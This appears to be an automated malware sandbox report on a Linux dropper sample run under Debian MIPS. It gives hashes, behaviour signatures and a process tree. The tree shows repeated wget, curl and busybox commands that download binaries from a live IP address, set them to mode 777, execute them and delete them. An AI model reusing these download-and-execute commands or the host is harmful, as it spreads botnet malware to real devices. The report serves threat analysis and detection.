Analysis
-
max time kernel
114s -
max time network
119s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24/11/2024, 01:31
Static task
static1
Behavioral task
behavioral1
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-mipsel-20240611-en
General
-
Target
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
-
Size
10KB
-
MD5
a7136f5f7aad005f449adf4d9eb6e330
-
SHA1
b6cddbe652904c25cc2e6c5f3063fb13a4df6737
-
SHA256
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5
-
SHA512
246aa712ed98a0566dc01bd9c38641f09934c708bff0e9535d33a324e832016dc28f55477382fd2c5611a9b79d4b4430ff37fb83814b6fcbb5db8b06708b657e
-
SSDEEP
192:8OyzO6my8zK4ZbHrTssv9my8zK4uHrTssiAl:CzOZzL
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 903 chmod 915 chmod 957 chmod 951 chmod 749 chmod 885 chmod 921 chmod 939 chmod 810 chmod 927 chmod 933 chmod 735 chmod 779 chmod 873 chmod 891 chmod 879 chmod 909 chmod 861 chmod 945 chmod 975 chmod 867 chmod 897 chmod 963 chmod 969 chmod 741 chmod 804 chmod 825 chmod 855 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ 736 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq 742 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL 750 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 780 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA 805 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl 811 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs 826 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS 856 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t 862 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t /tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA 868 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA /tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS 874 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS /tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv 880 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv /tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 886 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 /tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF 892 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS 898 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t 904 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t /tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv 910 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv /tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA 916 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA /tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS 922 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS /tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 928 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 /tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF 934 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl 940 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs 946 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ 952 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq 958 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL 964 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 970 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA 976 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl curl File opened for modification /tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS curl File opened for modification /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL curl File opened for modification /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA curl File opened for modification /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t curl File opened for modification /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ curl File opened for modification /tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 curl File opened for modification /tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF curl File opened for modification /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS curl File opened for modification /tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS curl File opened for modification /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 curl File opened for modification /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS curl File opened for modification /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs curl File opened for modification /tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA curl File opened for modification /tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF curl File opened for modification /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq curl File opened for modification /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL curl File opened for modification /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl curl File opened for modification /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 curl File opened for modification /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq curl File opened for modification /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA curl File opened for modification /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t curl File opened for modification /tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 curl File opened for modification /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ curl File opened for modification /tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA curl File opened for modification /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs curl File opened for modification /tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv curl File opened for modification /tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv curl
Processes
-
/tmp/a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N/tmp/a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:705
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:712
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:726
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:733
-
-
/bin/chmodchmod 777 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ./duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:737
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:738
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:740
-
-
/bin/chmodchmod 777 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq./u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:743
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:744
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:746
-
-
/bin/chmodchmod 777 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL./MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:753
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:754
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:772
-
-
/bin/chmodchmod 777 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27./9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:783
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:784
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:802
-
-
/bin/chmodchmod 777 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA./znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:806
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:807
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:809
-
-
/bin/chmodchmod 777 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl./kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:812
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:813
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:818
-
-
/bin/chmodchmod 777 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs./42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:829
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:831
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:850
-
-
/bin/chmodchmod 777 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS./1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:857
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:858
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:860
-
-
/bin/chmodchmod 777 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t./I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:863
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:864
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:866
-
-
/bin/chmodchmod 777 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA./qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:869
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:870
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:872
-
-
/bin/chmodchmod 777 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS./Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:875
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:876
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:878
-
-
/bin/chmodchmod 777 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv./IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:881
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:882
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:884
-
-
/bin/chmodchmod 777 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8./DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:887
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:888
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:890
-
-
/bin/chmodchmod 777 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF./9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:893
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:894
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:896
-
-
/bin/chmodchmod 777 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS./1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:899
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:900
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:902
-
-
/bin/chmodchmod 777 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t./I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:905
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:906
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:908
-
-
/bin/chmodchmod 777 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv./IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:911
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:912
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:914
-
-
/bin/chmodchmod 777 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA./qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:917
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:918
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:920
-
-
/bin/chmodchmod 777 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS./Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:923
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:924
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:926
-
-
/bin/chmodchmod 777 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8./DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:929
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:930
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:932
-
-
/bin/chmodchmod 777 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF./9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:935
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:936
-
-
